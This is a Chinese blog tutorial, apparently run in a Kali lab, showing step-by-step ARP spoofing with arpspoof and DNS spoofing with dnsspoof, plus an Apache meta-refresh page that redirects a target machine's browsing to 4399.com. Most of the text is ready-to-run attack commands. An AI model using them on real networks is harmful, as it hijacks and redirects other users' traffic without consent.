通过arpspoof,dnsspoof和Apache2进行DNS欺骗进行转发,例:转发到4399

首先先输入su进入root用户然后开启转发

echo 1 >/proc/sys/net/ipv4/ip_forward

看看是否开启成功,返回1为成功

cat /proc/sys/net/ipv4/ip_forward

下载dnsspoof工具

apt-get install dsniff  

从查看自己的ip和目标的ip

 

用kali的网关ip进行攻击

arpspoof -i eth0 -t 192.168.17.1 192.168.17.130

效果图

然后再写一个dns.txt

leafpad dns.txt
或者
vim dns.txt
哪个用着舒服用哪个,没有就apt install 应用包名安一下,如果用vim的话
先点键盘上的i键进入编辑模式,写好之后按esc,再按冒号,再输入wq就可以完成保存并退出

 dns.txt内容如下,把所有的网址都转到192.168.17.128里

 紧接着输入下面的命令就可以转发页面了,记得su进入root用户后再执行

dnsspoof -i eth0 -f /home/kali/dns.txt

下面再讲一下如何转发到你想要的页面,输入下面这行代码进入apacge2的配置页面

sudo vim /etc/apache2/sites-available/000-default.conf

然后打开之后添加下面的语句

ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
DocumentRoot后面的是你想要的配置文件路径

 效果是这样的

然后我们再在这个目录下新建一个html文件,名字随便起,内容如下 

<meta http-equiv="refresh" content="0;url=https://www.4399.com/" >
content后面的0是指响应时间,就是你想要多长时间再跳转页面,我这里想直接跳转,就是0,默认单位是秒
然后url就放你想要跳转的页面

保存退出后,我们启动apache2服务

sudo systemctl start apache2    //开启apache2服务
sudo systemctl stop apache2     //停止apache2服务
sudo systemctl restart apache2  //重启apache2服务

然后这个时候再重新执行下攻击命令

dnsspoof -i eth0 -f /home/kali/dns.txt  
记得也要先su进入root用户再执行

运行成功了,我们去目标机上试一下

 

 

成功了,不过对于https开头的网址是没办法替换的,大家娱乐一下就好啦 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值